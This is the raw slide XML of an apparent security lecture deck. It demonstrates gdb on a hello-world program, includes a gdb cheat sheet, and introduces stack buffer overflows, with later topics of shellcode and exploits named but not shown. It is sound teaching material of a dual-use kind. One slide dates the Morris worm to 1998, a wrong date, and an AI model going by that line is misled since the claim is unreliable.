            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Let's debug hello from before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378926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Starting gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 3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90213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt; gdb hello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>GNU gdb (GDB) 7.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(gdb) b _start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Breakpoint 1 at 0x4000b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>We load the program in gdb and set a breakpoint at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>_start</a:t>
            </a:r>
            <a:endParaRPr sz="2137"/>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Breakpoints insert (by default) a software interrupt at the given address (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>int3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>int3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t> executes, control transfers to gdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Original instruction is restored and executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t>Then, the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>int3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137"/>
              <a:t> is restored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211029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Running the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 3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1969">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(gdb) r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969">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Starting program: [...]/hello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969">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Breakpoint 1, 0x00000000004000b0 in _start ()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969">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>1: x/i $rip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969">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=&gt; 0x4000b0 &lt;_start&gt;:   movabs rdx,0x4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1969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/>
              <a:t>We run the program and immediately hit our breakpoint, as expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Our display command prints the current instruction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287816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Single-Stepping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si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0x00000000004000ba in _start ()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1: x/i $rip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=&gt; 0x4000ba &lt;_start+10&gt;:        mov    rsi,0x6000e4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0x00000000004000c1 in _start ()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1: x/i $rip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=&gt; 0x4000c1 &lt;_start+17&gt;:        mov    rdi,0x1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0x00000000004000c8 in _start ()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1: x/i $rip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=&gt; 0x4000c8 &lt;_start+24&gt;:        mov    rax,0x1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0x00000000004000cf in _start ()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1: x/i $rip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=&gt; 0x4000cf &lt;_start+31&gt;:        syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We can step the program instruction-by-instruction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219570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Inspecting State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 3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361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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(gdb) p $rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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$1 = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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(gdb) p $rsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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$2 = 6291684</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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(gdb) p/x $rsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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$3 = 0x6000e4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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(gdb) x/s $rsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/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0x6000e4:       "wat\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="275024" indent="-275024" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="1477"/>
              </a:spcBef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p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t> (print) prints values, e.g., register contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="275024" indent="-275024" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="1477"/>
              </a:spcBef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x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t> (examine) dereferences addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="275024" indent="-275024" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="1477"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t>Formatting suffixes, width control display</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550048" lvl="1" indent="-275024" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="1477"/>
              </a:spcBef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/x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t> for hex, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>/4xw</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t> for four 32 bit values in hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550048" lvl="1" indent="-275024" defTabSz="361460">
              <a:spcBef>
                <a:spcPts val="1477"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1980">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>/s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1980"/>
              <a:t> for null-terminated strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218582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Inspection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 3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x/8xb $rsp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0x7fffffffe430: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00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(gdb) x/8xg $rsp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0x7fffffffe430: 0x0000000000000001 0x00007fffffffe670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0x7fffffffe440: 0x0000000000000000 0x00007fffffffe6aa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0x7fffffffe450: 0x00007fffffffe6b6 0x00007fffffffe6c5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1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>0x7fffffffe460: 0x00007fffffffe6d6 0x00007fffffffe6df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/>
              <a:t>The stack can be inspected by referencing $rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Repetition suffix (above, 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Widths (b – bytes, w – dwords, g – qwords, ...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192014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Dumping CPU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 35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(gdb) i reg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rax            0x1      1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rbx            0x0      0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rcx            0x0      0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rdx            0x4      4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rsi            0x6000e4 6291684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rdi            0x1      1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rbp            0x0      0x0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rsp            0x7fffffffe430   0x7fffffffe430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[...]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rip            0x4000cf 0x4000cf &lt;_start+31&gt;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r>
              <a:rPr sz="2182">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>eflags         0x202    [ IF ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2182">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="303152" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182"/>
              <a:t>We can dump the entire (visible) CPU state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71575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Continuing Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Shape 3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None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gdb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) c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Continuing.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lang="en-US" sz="2250" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>[Inferior 1 (process 52390) exited normally]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2250" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>And, we can continue execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Here, we exit since we don't hit the breakpoint again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>And, we print out our </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>string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418391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49111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cheatsheet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688010"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1674214" y="889224"/>
          <a:ext cx="9679586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067"/>
                <a:gridCol w="653351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breakpoint </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                        <a:t>p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b </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1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Set a breakpoint</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> at an address, line number, or function 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print </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                        <a:t>p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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0" err="1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 the value of a variable, pointer, or register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 /[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>][format][width] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1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Inspect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err="1" smtClean="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> bytes of memory, printing using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>format</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Treat the memory as values of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>width.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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>reg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, frame, locals, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>args</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>]</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>reg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, frame, locals, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>args</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0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 the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> contents of the CPU registers, current frame, local variables, and arguments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backtrace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Print out the current frames on the stack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run &lt;arg1&gt; &lt;arg2&gt; &lt;arg3&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>r &lt;arg1&gt; &lt;arg2&gt; &lt;arg3&gt;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the program with the given arguments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step/next, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>stepi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nexti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s/n,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si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Execute the next line of code or instruction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (next doesn’t enter functions)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continue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 the program until the next breakpoint, or until it completes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6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Smashing the Stack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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit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5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-O0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abs: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-0x8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edi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cmp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-0x8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jge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.l0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-0x8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-0x4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jmp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.l1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.l0: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-0x8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-0x4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.l1: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lang="en-US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lang="en-US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-0x4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347472">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="266700" algn="l"/>
                <a:tab pos="533400" algn="l"/>
                <a:tab pos="800100" algn="l"/>
                <a:tab pos="1079500" algn="l"/>
                <a:tab pos="1346200" algn="l"/>
                <a:tab pos="1612900" algn="l"/>
                <a:tab pos="1879600" algn="l"/>
                <a:tab pos="2159000" algn="l"/>
                <a:tab pos="2425700" algn="l"/>
                <a:tab pos="2692400" algn="l"/>
                <a:tab pos="2971800" algn="l"/>
                <a:tab pos="32385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smtClean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  <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E34FF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-O3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abs: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edi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neg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cmovl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lang="en-US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edi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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lvl="0" indent="0" defTabSz="457200"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lang="en-US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lang="en-US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5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Stack-based Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 3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Stack-based buffer overflows are the quintessential memory corruption vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Problem known since the 1970s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>First known exploitation by the Morris work in 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Rediscovered in a 1995 Bugtraq post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>Smashing the Stack for Fun and Profit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>(Aleph One, Phrack 1996)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>People realized they were everywhere, and a serious security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408118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Stack-based Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 3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Vulnerability stems from several factors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Low-level languages are not memory-safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Control information is stored inline with user data on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Overflowing (writing past the end of) a stack buffer could allow users to control saved return addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>When a function returns using a corrupted stack frame, the user then controls execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1455432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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 3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05384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137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137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main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137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13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argc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137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13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**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13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305384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
